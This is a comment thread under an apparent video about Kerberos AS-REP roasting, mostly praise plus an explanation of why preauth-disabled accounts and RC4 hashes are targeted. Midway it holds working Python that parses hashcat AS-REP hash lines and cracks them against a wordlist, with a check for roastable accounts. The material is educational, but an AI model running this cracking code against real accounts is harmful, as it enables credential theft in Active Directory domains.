Your videos are exceptional, thank you so much for taking the time to create these! It's evident that you know your stuff and as such are able to provide the information in a clear and concise way.
Thank you for the awesome feedback! Glad you're enjoying the videos
Hi Conda, you explain very clearly. I don't have any AD experience but I was able to understand this video with no issues. Keep up the great work!
Thank you so much!
Another great video thanks again!!!
Thanks. Very clear explanation
Amazing video, thanks!
Nicely Explained. Thank You !!!
Insightful!
Awesome video!!
You have great content, I'm looking forward to your upcoming videos.
Thank you so much!
The content is on fire!!!!!
Thank you! 🔥🔥
Thanks man, your content is very useful.
Thanks! I appreciate it 😁
thank you!
Very well explained, good content, just like TCM-Security.
Hey there, excellent video. Between 02:14 and 02:20 I am trying to understand something. The AS-REQ has the timestamp encrypted with the user's password, which is then decrypted by the AS in the KDC to verify the timestamp. The AS-REP contains the TGT and some data encrypted with the user's password. If our intention was to obtain just the user's password, why not brute force the AS-REQ instead of the AS-REP? Am I missing something here?
Great question! The AS_REQ is sent by the client. So the client would be the one performing that timestamp encryption with their password. Since we are the client in this case and we don't know the password, we cannot perform this encryption action. This is the reason that we need to target an account with Kerberos preauthentication disabled.
Hope this helps to clarify!
@@c0nd4 Still a bit confused. So if I am an attacker, and the client is sending an AS-REQ which has the timestamp encrypted by the user's password, why can't I target this and crack the password?
You are the attacker and the client. You aren't intercepting a request that the client makes, you are essentially "impersonating" the client. But you cannot prove you are the client by encrypting a timestamp with the client's password, because you do not know it. So the only way for you to get the client's hash as an attacker is to find a client that doesn't require that encrypted timestamp (preauthentication); then you can send an AS_REQ without that encrypted timestamp. When you receive the TGT in the AS_REP, it will be encrypted with the NTLM hash of the client's password. We can then crack this. This is the first and only time in the process that the attacker will see something that is encrypted with the client's password hash. The encrypted timestamp is never sent at all because preauthentication is disabled.
@@c0nd4 Hey, question. Comp sci major here studying for OSCP soon. I was under the impression that most encryption standards are quite high now with AES, 3DES and RSA. How are these password hashes getting cracked? They should be salted as well? This would take quite a strong computer and too much time to decrypt any hashes.
By default the TGT is encrypted with RC4 which is a weak algorithm. Even these other hash types can be cracked with enough resources. The hash rates on modern graphics cards are impressive, especially when used in parallel.
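Added worked example (not code from the video or its author) to make the "why preauth matters" and "why RC4 cracks fast" points concrete. It implements the pieces an AS-REP roast actually relies on: the RC4-HMAC (etype 23) key is the unsalted NT hash, MD4 over the UTF-16LE password; the KDC encrypts the AS-REP enc-part under that key (Windows uses key usage 8 for this etype, per RFC 4757); hashcat's `$krb5asrep$23$` format is just that checksum and ciphertext; and "cracking" is guessing passwords until the HMAC-MD5 checksum verifies. The user name, realm, password, wordlist and the plaintext standing in for the real ASN.1 `EncASRepPart` are all constructed for the example. A pure-Python MD4 is included because hashlib's md4 is disabled in many OpenSSL 3 builds. The `dont_require_preauth` helper checks the `UF_DONT_REQUIRE_PREAUTH` bit (0x400000) of a userAccountControl value, which is how you recognise an account that can be roasted.

```python
import hmac
import os
import struct

MASK32 = 0xFFFFFFFF
AS_REP_ENC_PART_USAGE_RC4 = 8  # RFC 4757: Windows uses usage 8 for the RC4 AS-REP enc-part
UF_DONT_REQUIRE_PREAUTH = 0x400000  # userAccountControl bit: Kerberos preauth not required


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). Kerberos RC4-HMAC keys are MD4 of the UTF-16LE password."""
    msg = bytearray(data)
    bit_len = (8 * len(data)) & 0xFFFFFFFFFFFFFFFF
    msg.append(0x80)
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack('<Q', bit_len)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), tuple(range(16)), (3, 7, 11, 19), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack('<16I', msg[off:off + 64])
        A, B, C, D = a, b, c, d
        for f, order, shifts, const in rounds:
            for i, k in enumerate(order):
                A = _lrot((A + f(B, C, D) + X[k] + const) & MASK32, shifts[i % 4])
                A, B, C, D = D, A, B, C
        a, b, c, d = (a + A) & MASK32, (b + B) & MASK32, (c + C) & MASK32, (d + D) & MASK32
    return struct.pack('<4I', a, b, c, d)


def nt_hash(password: str) -> bytes:
    # No salt, no iteration: every guess costs one MD4, which is why GPUs chew through RC4 hashes.
    return md4(password.encode('utf-16-le'))


def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes = None):
    """Kerberos etype 23 (RFC 4757): returns (checksum, edata) as the KDC would produce them."""
    k1 = hmac.new(key, struct.pack('<I', usage), 'md5').digest()
    data = (confounder or os.urandom(8)) + plaintext
    checksum = hmac.new(k1, data, 'md5').digest()
    k3 = hmac.new(k1, checksum, 'md5').digest()
    return checksum, rc4(k3, data)


def rc4_hmac_decrypt(key: bytes, usage: int, checksum: bytes, edata: bytes):
    """Returns the plaintext if the checksum verifies under this key, else None (wrong guess)."""
    k1 = hmac.new(key, struct.pack('<I', usage), 'md5').digest()
    k3 = hmac.new(k1, checksum, 'md5').digest()
    data = rc4(k3, edata)
    if hmac.compare_digest(hmac.new(k1, data, 'md5').digest(), checksum):
        return data[8:]  # strip the 8-byte confounder
    return None


def asrep_hash_line(user: str, realm: str, checksum: bytes, edata: bytes) -> str:
    # hashcat mode 18200 / impacket GetNPUsers output format
    return f"$krb5asrep$23${user}@{realm}:{checksum.hex()}${edata.hex()}"


def parse_asrep_hash_line(line: str):
    prefix, rest = line.split(':', 1)
    if not prefix.startswith('$krb5asrep$23$'):
        raise ValueError('not an RC4 AS-REP hash line')
    user, realm = prefix[len('$krb5asrep$23$'):].split('@', 1)
    chk_hex, edata_hex = rest.split('$', 1)
    return user, realm, bytes.fromhex(chk_hex), bytes.fromhex(edata_hex)


def crack_asrep(line: str, wordlist):
    """Offline guess loop: the attacker only ever needs the AS-REP, never the user's timestamp."""
    _, _, checksum, edata = parse_asrep_hash_line(line)
    for candidate in wordlist:
        if rc4_hmac_decrypt(nt_hash(candidate), AS_REP_ENC_PART_USAGE_RC4, checksum, edata) is not None:
            return candidate
    return None


def dont_require_preauth(user_account_control: int) -> bool:
    return bool(user_account_control & UF_DONT_REQUIRE_PREAUTH)


def build_sample_asrep(user: str, realm: str, password: str) -> str:
    # Constructed stand-in for the AS-REP enc-part; a real one is an ASN.1 EncASRepPart.
    plaintext = b'constructed EncASRepPart stand-in for ' + user.encode()
    checksum, edata = rc4_hmac_encrypt(nt_hash(password), AS_REP_ENC_PART_USAGE_RC4, plaintext)
    return asrep_hash_line(user, realm, checksum, edata)


if __name__ == '__main__':
    line = build_sample_asrep('svc_backup', 'CORP.LOCAL', 'Winter2024!')  # constructed account
    print(line)
    print(crack_asrep(line, ['password', 'Summer2023!', 'Winter2024!']))
```

Note that nothing in the guess loop touches the network: once the KDC has handed over an AS-REP for a no-preauth account, every further attempt is local, and with no salt and one MD4 per guess the cost per candidate is tiny. With AES etypes the key is derived from the password with PBKDF2 and a salt, so the same roast is far slower per guess but still entirely offline.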
How do I know if Kerberos pre-auth is disabled? Is there an nmap script that can be used?
+1 sub!
Amazing video, many thanks